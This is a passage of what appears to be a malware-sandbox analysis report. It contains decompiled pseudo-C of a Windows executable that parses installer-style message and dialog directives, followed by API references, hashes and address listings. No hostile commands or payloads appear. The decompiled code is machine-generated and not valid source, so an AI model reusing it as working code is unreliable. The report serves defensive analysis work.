                											E003E0602(__ebp - 0xa894, __ebp - 0xb894, __esi) = __ebp - 0xa894;
                											__eax = E003DC2E4(__eflags, __ebp - 0xa894);
                											__esi =  *(__ebp - 0x1844) & 0x0000ffff;
                											__eax = __ebp - 0x1844;
                											__edx =  *(__ebp - 0x9894) & 0x0000ffff;
                											__edi = __ebp - 0xa894;
                											__ecx =  *(__ebp - 0x15894) & 0x0000ffff;
                											__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff);
                											asm("sbb esi, esi");
                											__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff) & __ebp - 0x00001844;
                											__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff);
                											__eax = __ebp - 0x9894;
                											asm("sbb edx, edx");
                											__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894;
                											__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff);
                											__eax = __ebp - 0x15894;
                											asm("sbb ecx, ecx");
                											__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894;
                											 *(__ebp - 0xa894) & 0x0000ffff =  ~( *(__ebp - 0xa894) & 0x0000ffff);
                											asm("sbb eax, eax");
                											 ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi = __ebp - 0x2844;
                											__ebp - 0xb894 = E003EA48A( ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894, 0, __ebp - 0xb894, __ebp - 0x2844,  ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi, __ecx,  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894, __esi);
                											__eflags =  *(__ebp - 0xc894) - __bx;
                											if( *(__ebp - 0xc894) != __bx) {
                												_push(0);
                												__eax = __ebp - 0xc894;
                												_push(__ebp - 0xc894);
                												_push(5);
                												_push(0x1000);
                												__eax =  *0x43308c();
                											}
                											goto L178;
                										}
                										goto L173;
                									}
                								}
                							case 0xa:
                								__eflags = __ebx - 7;
                								if(__ebx == 7) {
                									 *0x41a470 = 1;
                								}
                								goto L178;
                							case 0xb:
                								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                								__eax = E003F79E9( *(__ebp - 0x588c) & 0x0000ffff);
                								__eflags = __eax - 0x46;
                								if(__eax == 0x46) {
                									 *0x418461 = 1;
                								} else {
                									__eflags = __eax - 0x55;
                									if(__eax == 0x55) {
                										 *0x418462 = 1;
                									} else {
                										__eax = 0;
                										 *0x418461 = __al;
                										 *0x418462 = __al;
                									}
                								}
                								goto L178;
                							case 0xc:
                								 *0x427b7a = 1;
                								__eax = __eax + 0x427b7a;
                								_t125 = __esi + 0x39;
                								 *_t125 =  *(__esi + 0x39) + __esp;
                								__eflags =  *_t125;
                								__ebp = 0xffffa774;
                								if( *_t125 != 0) {
                									_t127 = __ebp - 0x588c; // 0xffff4ee8
                									__eax = _t127;
                									 *0x40e728 = E003E1FA7(_t127);
                								}
                								goto L178;
                						}
                						L4:
                						_push(0x1000);
                						_push(_t311);
                						_push(_t237);
                						_t237 = E003EAF98();
                						_t311 = _t311 + 0x2000;
                						_t308 = _t308 - 1;
                						if(_t308 != 0) {
                							goto L4;
                						} else {
                							_t312 = _t308;
                							goto L6;
                						}
                						L178:
                						_push(0x1000);
                						_t221 = _t316 - 0x15; // 0xffffa75f
                						_t222 = _t316 - 0xd; // 0xffffa767
                						_t223 = _t316 - 0x588c; // 0xffff4ee8
                						_t224 = _t316 - 0xf894; // 0xfffeaee0
                						_push( *((intOrPtr*)(_t316 + 0xc)));
                						_t232 = E003EB314(_t308, _t316);
                						_t293 =  *((intOrPtr*)(_t316 + 0x10));
                						 *((intOrPtr*)(_t316 + 0xc)) = _t232;
                					} while (_t232 != 0);
                				}
                			}












                APIs
                • __EH_prolog.LIBCMT ref: 003EC744
                  • Part of subcall function 003EB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 003EB3FB
                  • Part of subcall function 003EAF98: _wcschr.LIBVCRUNTIME ref: 003EB033
                • _wcslen.LIBCMT ref: 003ECA0A
                • _wcslen.LIBCMT ref: 003ECA13
                • SetWindowTextW.USER32(?,?), ref: 003ECA71
                • _wcslen.LIBCMT ref: 003ECAB3
                • _wcsrchr.LIBVCRUNTIME ref: 003ECBFB
                • GetDlgItem.USER32(?,00000066), ref: 003ECC36
                • SetWindowTextW.USER32(00000000,?), ref: 003ECC46
                • SendMessageW.USER32(00000000,00000143,00000000,0041A472), ref: 003ECC54
                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003ECC7F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$>
                • API String ID: 986293930-2327693528
                • Opcode ID: 1a47c4af413b45d1a31a2e62357493fd14b10f7887a7e643eb9811062770da7e
                • Instruction ID: 5671c823622c51abc22ce933ca017d725e8e52b6e99e4aef3d7f1ad6d4a49344
                • Opcode Fuzzy Hash: 1a47c4af413b45d1a31a2e62357493fd14b10f7887a7e643eb9811062770da7e
                • Instruction Fuzzy Hash: 65E18672900269AADF26DBA1DD85EEF73BCAF04310F4041A6F605E7080EB749F858F64
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E003DDA67(char* __ecx, signed int __edx) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				char* _t245;
                				void* _t246;
                				WCHAR* _t247;
                				void* _t252;
                				unsigned int _t258;
                				signed int _t264;
                				signed int _t268;
                				void* _t279;
                				signed short* _t283;
                				void* _t284;
                				void* _t290;
                				signed short* _t294;
                				void* _t295;
                				signed int _t299;
                				signed int _t303;
                				signed int _t318;
                				signed int _t322;
                				signed int _t324;
                				signed int _t326;
                				signed int _t333;
                				char* _t334;
                				signed int _t338;
                				short _t341;
                				void* _t342;
                				signed int _t346;
                				char* _t348;
                				char* _t350;
                				char* _t355;
                				void* _t358;
                				void* _t360;
                				void* _t363;
                				signed int _t372;
                				char* _t374;
                				unsigned int _t385;
                				unsigned int _t389;
                				signed int _t392;
                				signed int _t397;
                				signed int _t399;
                				void* _t400;
                				signed int _t401;
                				void* _t404;
                				signed int _t406;
                				signed int _t407;
                				signed int _t410;
                				signed int _t411;
                				signed int _t412;
                				char* _t421;
                				signed int _t424;
                				signed int _t425;
                				void* _t430;
                				char* _t434;
                				signed int _t443;
                				signed int _t444;
                				signed int _t447;
                				signed int _t448;
                				signed int _t449;
                				signed int _t450;
                				char* _t451;
                				signed int _t453;
                				signed int _t455;
                				void* _t456;
                				intOrPtr* _t459;
                				signed int _t461;
                				signed int _t462;
                				char* _t463;
                				signed int _t466;
                				signed int _t467;
                				char** _t468;
                				void* _t470;
                				void* _t471;
                				void* _t473;
                				void* _t477;
                				void* _t478;
                
                				_t443 = __edx;
                				_t471 = _t470 - 0x54;
                				E003EEB78(0x4029bd, _t468);
                				E003EEC50(0x41fc);
                				_t245 = 0x5c;
                				_push(_t245);
                				_push(_t468[0x18]);
                				_t459 = __ecx;
                				_t468[4] = _t245;
                				_t468[0xe] = __ecx;
                				_t246 = E003F22C6(__ecx);
                				_t372 = 0;
                				_t475 = _t246;
                				_t247 = _t468 - 0x31d0;
                				if(_t246 != 0) {
                					E003E0602(_t247, _t468[0x18], 0x800);
                				} else {
                					GetModuleFileNameW(0, _t247, 0x800);
                					 *((short*)(E003DC29A(_t475, _t468 - 0x31d0))) = 0;
                					E003E05DA(_t475, _t468 - 0x31d0, _t468[0x18], 0x800);
                				}
                				E003D9556(_t468 - 0x4208);
                				_push(4);
                				 *(_t468 - 4) = _t372;
                				_push(_t468 - 0x31d0);
                				if(E003D98E0(_t468 - 0x4208, _t459) == 0) {
                					L125:
                					_t252 = E003D959A(_t468 - 0x4208); // executed
                					 *[fs:0x0] =  *((intOrPtr*)(_t468 - 0xc));
                					__eflags =  &(_t468[0x16]);
                					return _t252;
                				} else {
                					_t447 = _t372;
                					_t477 =  *0x40e720 - _t447; // 0x64
                					if(_t477 <= 0) {
                						L7:
                						E003F6310(_t372,  *_t459,  *((intOrPtr*)(_t459 + 4)), 4, E003DD6E0);
                						E003F6310(_t372,  *((intOrPtr*)(_t459 + 0x14)),  *((intOrPtr*)(_t459 + 0x18)), 4, E003DD640);
                						_t473 = _t471 + 0x20;
                						_t468[0x14] = _t372;
                						_t448 = _t447 | 0xffffffff;
                						_t468[0xf] = _t372;
                						while(_t448 == 0xffffffff) {
                							_t348 = E003D9E80(_t468 - 0x4208); // executed
                							_t468[0x12] = _t348;
                							_t350 = E003D9BD0(_t468 - 0x4208, _t443, _t468 - 0x21d0, 0x2000);
                							_t468[0x11] = _t350;
                							_t467 = _t372;
                							_t24 = _t350 - 0x10; // -16
                							_t434 = _t24;
                							_t468[0xa] = _t434;
                							if(_t434 < 0) {
                								L25:
                								_t351 = _t468[0x12];
                								L26:
                								E003D9D70(_t468 - 0x4208, _t468,  &(_t351[ &(_t468[0x11][0xfffffffffffffff0])]), _t372, _t372);
                								_t355 =  &(_t468[0xf][1]);
                								_t468[0xf] = _t355;
                								__eflags = _t355 - 0x100;
                								if(_t355 < 0x100) {
                									continue;
                								}
                								__eflags = _t448 - 0xffffffff;
                								if(_t448 == 0xffffffff) {
                									goto L125;
                								}
                								break;
                							} else {
                								goto L10;
                							}
                							L12:
                							_t363 = E003F6740(_t468 - 0x21ce + _t467, "*messages***", 0xb);
                							_t473 = _t473 + 0xc;
                							if(_t363 == 0) {
                								L24:
                								_t351 = _t468[0x12];
                								_t448 =  &(_t468[0x12][_t467]);
                								goto L26;
                							} else {
                								_t350 = _t468[0x11];
                							}
                							L14:
                							_t443 = 0x2a;
                							if( *((intOrPtr*)(_t468 + _t467 - 0x21d0)) != _t443) {
                								L18:
                								if( *((char*)(_t468 + _t467 - 0x21d0)) != 0x52 ||  *((char*)(_t468 + _t467 - 0x21cf)) != 0x61) {
                									L21:
                									_t467 = _t467 + 1;
                									if(_t467 > _t468[0xa]) {
                										goto L25;
                									} else {
                										_t350 = _t468[0x11];
                										L10:
                										if( *((char*)(_t468 + _t467 - 0x21d0)) != 0x2a ||  *((char*)(_t468 + _t467 - 0x21cf)) != 0x2a) {
                											goto L14;
                										} else {
                											goto L12;
                										}
                									}
                								} else {
                									_t358 = E003F6740(_t468 - 0x21ce + _t467, 0x4039c8, 4);
                									_t473 = _t473 + 0xc;
                									if(_t358 == 0) {
                										goto L125;
                									}
                									goto L21;
                								}
                							}
                							_t439 = _t468 - 0x21cc + _t467;
                							if( *((intOrPtr*)(_t468 - 0x21cc + _t467 - 2)) == _t443 && _t467 <=  &(_t350[0xffffffffffffffe0])) {
                								_t360 = E003F6088(_t439, L"*messages***", 0xb);
                								_t473 = _t473 + 0xc;
                								if(_t360 == 0) {
                									_t468[0x14] = 1;
                									goto L24;
                								}
                							}
                							goto L18;
                						}
                						asm("cdq");
                						E003D9D70(_t468 - 0x4208, _t468, _t448, _t443, _t372);
                						_push(0x200002);
                						_t461 = E003F3E33(_t468 - 0x4208);
                						_t468[0x13] = _t461;
                						__eflags = _t461;
                						if(_t461 == 0) {
                							goto L125;
                						}
                						_t258 = E003D9BD0(_t468 - 0x4208, _t443, _t461, 0x200000);
                						__eflags = _t468[0x14];
                						_t385 = _t258;
                						_t468[0x12] = _t385;
                						if(_t468[0x14] == 0) {
                							_push(2 + _t385 * 2);
                							_t449 = E003F3E33(_t385);
                							__eflags = _t449;
                							if(_t449 == 0) {
                								goto L125;
                							}
                							_t468[0x12][_t461] = _t372;
                							E003E1B84(_t461, _t449,  &(_t468[0x12][1]));
                							L003F3E2E(_t461);
                							_t389 = _t468[0x12];
                							_t461 = _t449;
                							_t468[0x13] = _t461;
                							L33:
                							_t264 = 0x100000;
                							__eflags = _t389 - 0x100000;
                							if(_t389 <= 0x100000) {
                								_t264 = _t389;
                							}
                							 *((short*)(_t461 + _t264 * 2)) = 0;
                							E003E05A7(_t468 - 0x108, 0x4039d0, 0x64);
                							_push(0x20002);
                							_t450 = E003F3E33(0);
                							_t468[0x11] = _t450;
                							__eflags = _t450;
                							if(_t450 != 0) {
                								__eflags = _t468[0x12];
                								_t462 = _t372;
                								_t392 = _t372;
                								_t468[0xc] = _t462;
                								_t268 = _t372;
                								 *(_t468 - 0x40) = _t372;
                								_t468[0xb] = _t392;
                								_t468[0x15] = _t268;
                								_t468[0xa] = 0x20;
                								_t468[0xf] = 9;
                								if(_t468[0x12] <= 0) {
                									L109:
                									__eflags =  *(_t468 - 0x40);
                									if( *(_t468 - 0x40) == 0) {
                										_t463 = _t468[0xe];
                										L122:
                										L003F3E2E(_t468[0x13]);
                										L003F3E2E(_t468[0x11]);
                										_t451 =  &(_t463[0x3c]);
                										__eflags = _t463[0x2c] - _t372;
                										if(_t463[0x2c] <= _t372) {
                											L124:
                											 *0x4110b8 = _t463[0x28];
                											E003F6310(_t372,  *_t451, _t463[0x40], 4, E003DD7A0);
                											E003F6310(_t372, _t463[0x50], _t463[0x54], 4, E003DD7D0);
                											goto L125;
                										} else {
                											goto L123;
                										}
                										do {
                											L123:
                											E003DE261(_t451, _t443, _t372);
                											E003DE261( &(_t463[0x50]), _t443, _t372);
                											_t372 = _t372 + 1;
                											__eflags = _t372 - _t463[0x2c];
                										} while (_t372 < _t463[0x2c]);
                										goto L124;
                									}
                									_t468[7] = _t392;
                									_t468[8] = E003F8CCE(_t372, _t462, _t468 - 0x40);
                									_pop(_t397);
                									__eflags = _t462;
                									if(_t462 == 0) {
                										L118:
                										 *(_t450 + _t462 * 2) = 0;
                										_t279 = 0x22;
                										__eflags =  *_t450 - _t279;
                										if( *_t450 == _t279) {
                											__eflags = _t450;
                										}
                										_t468[9] = E003F7625(_t372, _t450);
                										asm("movsd");
                										asm("movsd");
                										asm("movsd");
                										_t463 = _t468[0xe];
                										E003DE27C( &(_t463[0x28]), _t443, _t397, _t397, _t450);
                										goto L122;
                									}
                									_t212 = _t462 - 1; // -1
                									_t283 = _t450 + _t212 * 2;
                									_t443 = 0x20;
                									do {
                										_t397 =  *_t283 & 0x0000ffff;
                										__eflags = _t397 - _t443;
                										if(_t397 == _t443) {
                											goto L114;
                										}
                										__eflags = _t397 - _t468[0xf];
                										if(_t397 != _t468[0xf]) {
                											break;
                										}
                										L114:
                										_t397 = 0;
                										 *_t283 = 0;
                										_t283 = _t283 - 2;
                										_t462 = _t462 - 1;
                										__eflags = _t462;
                									} while (_t462 != 0);
                									__eflags = _t462;
                									if(_t462 != 0) {
                										_t284 = 0x22;
                										__eflags =  *((intOrPtr*)(_t450 + _t462 * 2 - 2)) - _t284;
                										if( *((intOrPtr*)(_t450 + _t462 * 2 - 2)) == _t284) {
                											__eflags = 0;
                											 *((short*)(_t450 + _t462 * 2 - 2)) = 0;
                										}
                									}
                									goto L118;
                								}
                								_t468[6] = 0xd;
                								_t468[5] = 0xa;
                								do {
                									_t399 = _t468[0x13];
                									__eflags = _t268;
                									if(_t268 == 0) {
                										L75:
                										_t443 =  *(_t399 + _t268 * 2) & 0x0000ffff;
                										_t268 = _t268 + 1;
                										_t468[0x15] = _t268;
                										__eflags = _t443;
                										if(_t443 == 0) {
                											break;
                										}
                										__eflags = _t443 - _t468[4];
                										if(_t443 != _t468[4]) {
                											_t400 = 0xd;
                											__eflags = _t443 - _t400;
                											if(_t443 == _t400) {
                												L93:
                												__eflags =  *(_t468 - 0x40);
                												if( *(_t468 - 0x40) == 0) {
                													L105:
                													 *(_t468 - 0x40) = _t372;
                													_t462 = _t372;
                													_t468[0xb] = _t372;
                													L106:
                													_t468[0xc] = _t462;
                													goto L107;
                												}
                												_t468[7] = _t468[0xb];
                												_t468[8] = E003F8CCE(_t372, _t462, _t468 - 0x40);
                												_pop(_t401);
                												__eflags = _t462;
                												if(_t462 == 0) {
                													L102:
                													 *(_t450 + _t462 * 2) = 0;
                													_t290 = 0x22;
                													__eflags =  *_t450 - _t290;
                													if( *_t450 == _t290) {
                														__eflags = _t450;
                													}
                													_t468[9] = E003F7625(_t372, _t450);
                													asm("movsd");
                													asm("movsd");
                													asm("movsd");
                													E003DE27C( &(_t468[0xe][0x28]), _t443, _t401, _t401, _t450);
                													_t450 = _t468[0x11];
                													_t268 = _t468[0x15];
                													goto L105;
                												}
                												_t185 = _t462 - 1; // -1
                												_t294 = _t450 + _t185 * 2;
                												_t443 = 0x20;
                												do {
                													_t401 =  *_t294 & 0x0000ffff;
                													__eflags = _t401 - _t443;
                													if(_t401 == _t443) {
                														goto L98;
                													}
                													__eflags = _t401 - _t468[0xf];
                													if(_t401 != _t468[0xf]) {
                														break;
                													}
                													L98:
                													_t401 = 0;
                													 *_t294 = 0;
                													_t294 = _t294 - 2;
                													_t462 = _t462 - 1;
                													__eflags = _t462;
                												} while (_t462 != 0);
                												__eflags = _t462;
                												if(_t462 != 0) {
                													_t295 = 0x22;
                													__eflags =  *((intOrPtr*)(_t450 + _t462 * 2 - 2)) - _t295;
                													if( *((intOrPtr*)(_t450 + _t462 * 2 - 2)) == _t295) {
                														__eflags = 0;
                														 *((short*)(_t450 + _t462 * 2 - 2)) = 0;
                													}
                												}
                												goto L102;
                											}
                											_t404 = 0xa;
                											__eflags = _t443 - _t404;
                											if(_t443 == _t404) {
                												goto L93;
                											}
                											__eflags = _t462 - 0x10000;
                											if(_t462 >= 0x10000) {
                												goto L107;
                											}
                											L92:
                											 *(_t450 + _t462 * 2) = _t443;
                											_t462 = _t462 + 1;
                											goto L106;
                										}
                										__eflags = _t462 - 0x10000;
                										if(_t462 >= 0x10000) {
                											goto L107;
                										}
                										_t406 = ( *(_t399 + _t268 * 2) & 0x0000ffff) - 0x22;
                										__eflags = _t406;
                										if(_t406 == 0) {
                											_push(0x22);
                											L88:
                											_pop(_t407);
                											 *(_t450 + _t462 * 2) = _t407;
                											_t268 = _t268 + 1;
                											_t468[0x15] = _t268;
                											_t462 = _t462 + 1;
                											goto L106;
                										}
                										_t410 = _t406 - 0x3a;
                										__eflags = _t410;
                										if(_t410 == 0) {
                											_push(0x5c);
                											goto L88;
                										}
                										_t411 = _t410 - 0x12;
                										__eflags = _t411;
                										if(_t411 == 0) {
                											_push(0xa);
                											goto L88;
                										}
                										_t412 = _t411 - 4;
                										__eflags = _t412;
                										if(_t412 == 0) {
                											_push(0xd);
                											goto L88;
                										}
                										__eflags = _t412 != 0;
                										if(_t412 != 0) {
                											goto L92;
                										}
                										_push(9);
                										goto L88;
                									}
                									_t444 =  *(_t399 + _t268 * 2 - 2) & 0x0000ffff;
                									__eflags = _t444 - _t468[6];
                									if(_t444 == _t468[6]) {
                										L42:
                										_t443 = 0x3a;
                										__eflags =  *(_t399 + _t268 * 2) - _t443;
                										if( *(_t399 + _t268 * 2) != _t443) {
                											L65:
                											_t468[0x10] = _t399 + _t268 * 2;
                											_t299 = E003E045B( *(_t399 + _t268 * 2) & 0x0000ffff);
                											__eflags = _t299;
                											if(_t299 == 0) {
                												L74:
                												_t399 = _t468[0x13];
                												_t268 = _t468[0x15];
                												goto L75;
                											}
                											E003E0602(_t468 - 0x298, _t468[0x10], 0x64);
                											_t303 = E003F6105(_t468 - 0x298, L" \t,");
                											_t468[0x10] = _t303;
                											__eflags = _t303;
                											if(_t303 == 0) {
                												goto L74;
                											}
                											 *_t303 = 0;
                											E003E1DA7(_t468 - 0x298, _t468 - 0x16c, 0x64);
                											E003E05A7(_t468 - 0xa4, _t468 - 0x108, 0x64);
                											E003E0580(__eflags, _t468 - 0xa4, _t468 - 0x16c, 0x64);
                											E003E05A7(_t468 - 0x40, _t468 - 0xa4, 0x32);
                											_t318 = E003F6159(_t372, 0, _t443, _t462, _t468 - 0xa4,  *(_t468[0xe]), _t468[0xe][4], 4, E003DD780);
                											_t473 = _t473 + 0x14;
                											__eflags = _t318;
                											if(_t318 != 0) {
                												_t322 =  *_t318 * 0xc;
                												__eflags = _t322;
                												_t156 = _t322 + 0x40e270; // 0x28b64ee0
                												_t468[0xb] =  *_t156;
                											}
                											_t268 =  &(( &(_t468[0x15][1]))[_t468[0x10] - _t468 - 0x298 >> 1]);
                											__eflags = _t268;
                											_t421 = _t468[0x13];
                											while(1) {
                												_t443 =  *(_t421 + _t268 * 2) & 0x0000ffff;
                												__eflags = _t443 - _t468[0xa];
                												if(_t443 == _t468[0xa]) {
                													goto L72;
                												}
                												L71:
                												__eflags = _t443 - _t468[0xf];
                												if(_t443 != _t468[0xf]) {
                													_t468[0x15] = _t268;
                													goto L107;
                												}
                												L72:
                												_t268 = _t268 + 1;
                												_t443 =  *(_t421 + _t268 * 2) & 0x0000ffff;
                												__eflags = _t443 - _t468[0xa];
                												if(_t443 == _t468[0xa]) {
                													goto L72;
                												}
                												goto L71;
                											}
                										}
                										_t453 = _t468[0x15];
                										_t324 = _t268 | 0xffffffff;
                										__eflags = _t324;
                										_t466 = _t372;
                										_t468[0xd] = _t324;
                										_t374 = _t468[0x13];
                										 *_t468 = L"STRINGS";
                										_t468[1] = L"DIALOG";
                										_t468[2] = L"MENU";
                										_t468[3] = L"DIRECTION";
                										do {
                											_t468[0x10] = E003F3E13(_t468[_t466]);
                											_t326 = E003F6088( &(_t374[2]) + _t453 * 2, _t468[_t466], _t325);
                											_t473 = _t473 + 0x10;
                											__eflags = _t326;
                											if(_t326 != 0) {
                												L47:
                												_t424 = _t468[0xd];
                												goto L48;
                											}
                											_t346 =  &(_t468[0x10][_t453]);
                											_t430 = 0x20;
                											__eflags = _t374[2 + _t346 * 2] - _t430;
                											if(_t374[2 + _t346 * 2] > _t430) {
                												goto L47;
                											}
                											_t424 = _t466;
                											_t453 = _t346 + 1;
                											_t468[0xd] = _t424;
                											L48:
                											_t466 = _t466 + 1;
                											__eflags = _t466 - 4;
                										} while (_t466 < 4);
                										_t462 = _t468[0xc];
                										_t372 = 0;
                										_t468[0x15] = _t453;
                										_t450 = _t468[0x11];
                										__eflags = _t424;
                										if(__eflags != 0) {
                											_t268 = _t468[0x15];
                											_t399 = _t468[0x13];
                											if(__eflags <= 0) {
                												goto L65;
                											} else {
                												goto L53;
                											}
                											while(1) {
                												L53:
                												_t443 = _t399 + _t268 * 2;
                												_t455 =  *_t443 & 0x0000ffff;
                												__eflags = _t455 - _t468[0xa];
                												if(_t455 == _t468[0xa]) {
                													goto L55;
                												}
                												L54:
                												__eflags = _t455 - _t468[0xf];
                												if(_t455 != _t468[0xf]) {
                													_t468[0x15] = _t268;
                													_t425 = _t372;
                													_t456 = 0x20;
                													__eflags = ( *_t443 & 0x0000ffff) - _t456;
                													_t468[0x10] = _t372;
                													_t450 = _t468[0x11];
                													if(( *_t443 & 0x0000ffff) <= _t456) {
                														L60:
                														 *((short*)(_t468 + _t425 * 2 - 0x1d0)) = 0;
                														E003E1DA7(_t468 - 0x1d0, _t468 - 0xa4, 0x64);
                														_t468[0x15] =  &(_t468[0x15][_t468[0x10]]);
                														_t333 = _t468[0xd];
                														__eflags = _t333 - 3;
                														if(_t333 != 3) {
                															__eflags = _t333 - 1;
                															_t334 = "$%s:";
                															if(_t333 != 1) {
                																_t334 = "@%s:";
                															}
                															E003DE5B1(_t468 - 0x108, 0x64, _t334, _t468 - 0xa4);
                															_t473 = _t473 + 0x10;
                														} else {
                															_t338 = E003F3E49(_t468 - 0x1d0, _t468 - 0x1d0, L"RTL");
                															asm("sbb al, al");
                															_t468[0xe][0x64] =  ~_t338 + 1;
                														}
                														L51:
                														_t268 = _t468[0x15];
                														goto L107;
                													} else {
                														goto L57;
                													}
                													while(1) {
                														L57:
                														__eflags = _t425 - 0x63;
                														if(_t425 >= 0x63) {
                															break;
                														}
                														_t341 =  *_t443;
                														_t443 = _t443 + 2;
                														 *((short*)(_t468 + _t425 * 2 - 0x1d0)) = _t341;
                														_t425 = _t425 + 1;
                														_t342 = 0x20;
                														__eflags =  *_t443 - _t342;
                														if( *_t443 > _t342) {
                															continue;
                														}
                														break;
                													}
                													_t468[0x10] = _t425;
                													goto L60;
                												}
                												L55:
                												_t268 = _t268 + 1;
                												L53:
                												_t443 = _t399 + _t268 * 2;
                												_t455 =  *_t443 & 0x0000ffff;
                												__eflags = _t455 - _t468[0xa];
                												if(_t455 == _t468[0xa]) {
                													goto L55;
                												}
                												goto L54;
                											}
                										}
                										E003E05A7(_t468 - 0x108, 0x4039d0, 0x64);
                										goto L51;
                									}
                									__eflags = _t444 - _t468[5];
                									if(_t444 != _t468[5]) {
                										goto L75;
                									}
                									goto L42;
                									L107:
                									__eflags = _t268 - _t468[0x12];
                								} while (_t268 < _t468[0x12]);
                								_t392 = _t468[0xb];
                								goto L109;
                							} else {
                								L003F3E2E(_t461);
                								goto L125;
                							}
                						}
                						_t389 = _t385 >> 1;
                						_t468[0x12] = _t389;
                						goto L33;
                					} else {
                						goto L5;
                					}
                					goto L7;
                					L5:
                					E003DE261(_t459, _t443, _t447);
                					E003DE261(_t459 + 0x14, _t443, _t447);
                					_t447 = _t447 + 1;
                					_t478 = _t447 -  *0x40e720; // 0x64
                					if(_t478 < 0) {
                						goto L5;
                					} else {
                						_t372 = 0;
                						goto L7;
                					}
                				}
                			}

                0x003de1aa
                0x003de1a6
                0x00000000
                0x003de19c
                0x003ddd80
                0x003ddd87
                0x003ddd8e
                0x003ddd8e
                0x003ddd91
                0x003ddd93
                0x003de02a
                0x003de02a
                0x003de02e
                0x003de02f
                0x003de032
                0x003de035
                0x00000000
                0x00000000
                0x003de03b
                0x003de03f
                0x003de092
                0x003de093
                0x003de096
                0x003de0b6
                0x003de0b6
                0x003de0ba
                0x003de145
                0x003de145
                0x003de148
                0x003de14a
                0x003de14d
                0x003de14d
                0x00000000
                0x003de14d
                0x003de0c3
                0x003de0cf
                0x003de0d2
                0x003de0d3
                0x003de0d5
                0x003de110
                0x003de112
                0x003de118
                0x003de119
                0x003de11c
                0x003de11e
                0x003de11e
                0x003de131
                0x003de137
                0x003de138
                0x003de139
                0x003de13a
                0x003de13f
                0x003de142
                0x00000000
                0x003de142
                0x003de0d7
                0x003de0dc
                0x003de0df
                0x003de0e0
                0x003de0e0
                0x003de0e3
                0x003de0e6
                0x00000000
                0x00000000
                0x003de0e8
                0x003de0ec
                0x00000000
                0x00000000
                0x003de0ee
                0x003de0ee
                0x003de0f0
                0x003de0f3
                0x003de0f6
                0x003de0f6
                0x003de0f6
                0x003de0fb
                0x003de0fd
                0x003de101
                0x003de102
                0x003de107
                0x003de109
                0x003de10b
                0x003de10b
                0x003de107
                0x00000000
                0x003de0fd
                0x003de09a
                0x003de09b
                0x003de09e
                0x00000000
                0x00000000
                0x003de0a0
                0x003de0a6
                0x00000000
                0x00000000
                0x003de0ac
                0x003de0ac
                0x003de0b0
                0x00000000
                0x003de0b0
                0x003de041
                0x003de047
                0x00000000
                0x00000000
                0x003de051
                0x003de051
                0x003de054
                0x003de07b
                0x003de07d
                0x003de07d
                0x003de07e
                0x003de085
                0x003de086
                0x003de089
                0x00000000
                0x003de089
                0x003de056
                0x003de056
                0x003de059
                0x003de077
                0x00000000
                0x003de077
                0x003de05b
                0x003de05b
                0x003de05e
                0x003de073
                0x00000000
                0x003de073
                0x003de060
                0x003de060
                0x003de063
                0x003de06f
                0x00000000
                0x003de06f
                0x003de066
                0x003de069
                0x00000000
                0x00000000
                0x003de06b
                0x00000000
                0x003de06b
                0x003ddd99
                0x003ddd9e
                0x003ddda2
                0x003dddae
                0x003dddb0
                0x003dddb1
                0x003dddb5
                0x003ddf29
                0x003ddf2c
                0x003ddf33
                0x003ddf38
                0x003ddf3a
                0x003de024
                0x003de024
                0x003de027
                0x00000000
                0x003de027
                0x003ddf4c
                0x003ddf5d
                0x003ddf62
                0x003ddf67
                0x003ddf69
                0x00000000
                0x00000000
                0x003ddf71
                0x003ddf84
                0x003ddf99
                0x003ddfae
                0x003ddfc0
                0x003ddfdb
                0x003ddfe0
                0x003ddfe3
                0x003ddfe5
                0x003ddfe7
                0x003ddfe7
                0x003ddfea
                0x003ddff0
                0x003ddff0
                0x003de004
                0x003de004
                0x003de006
                0x003de009
                0x003de009
                0x003de00d
                0x003de011
                0x00000000
                0x00000000
                0x003de013
                0x003de013
                0x003de017
                0x003de01c
                0x00000000
                0x003de01c
                0x003de019
                0x003de019
                0x003de009
                0x003de00d
                0x003de011
                0x00000000
                0x00000000
                0x00000000
                0x003de011
                0x003de009
                0x003dddbb
                0x003dddbe
                0x003dddbe
                0x003dddc1
                0x003dddc3
                0x003dddc6
                0x003dddc9
                0x003dddd0
                0x003dddd7
                0x003dddde
                0x003ddde5
                0x003dddf6
                0x003dddfd
                0x003dde02
                0x003dde05
                0x003dde07
                0x003dde22
                0x003dde22
                0x00000000
                0x003dde22
                0x003dde0c
                0x003dde10
                0x003dde11
                0x003dde16
                0x00000000
                0x00000000
                0x003dde18
                0x003dde1a
                0x003dde1d
                0x003dde25
                0x003dde25
                0x003dde26
                0x003dde26
                0x003dde2b
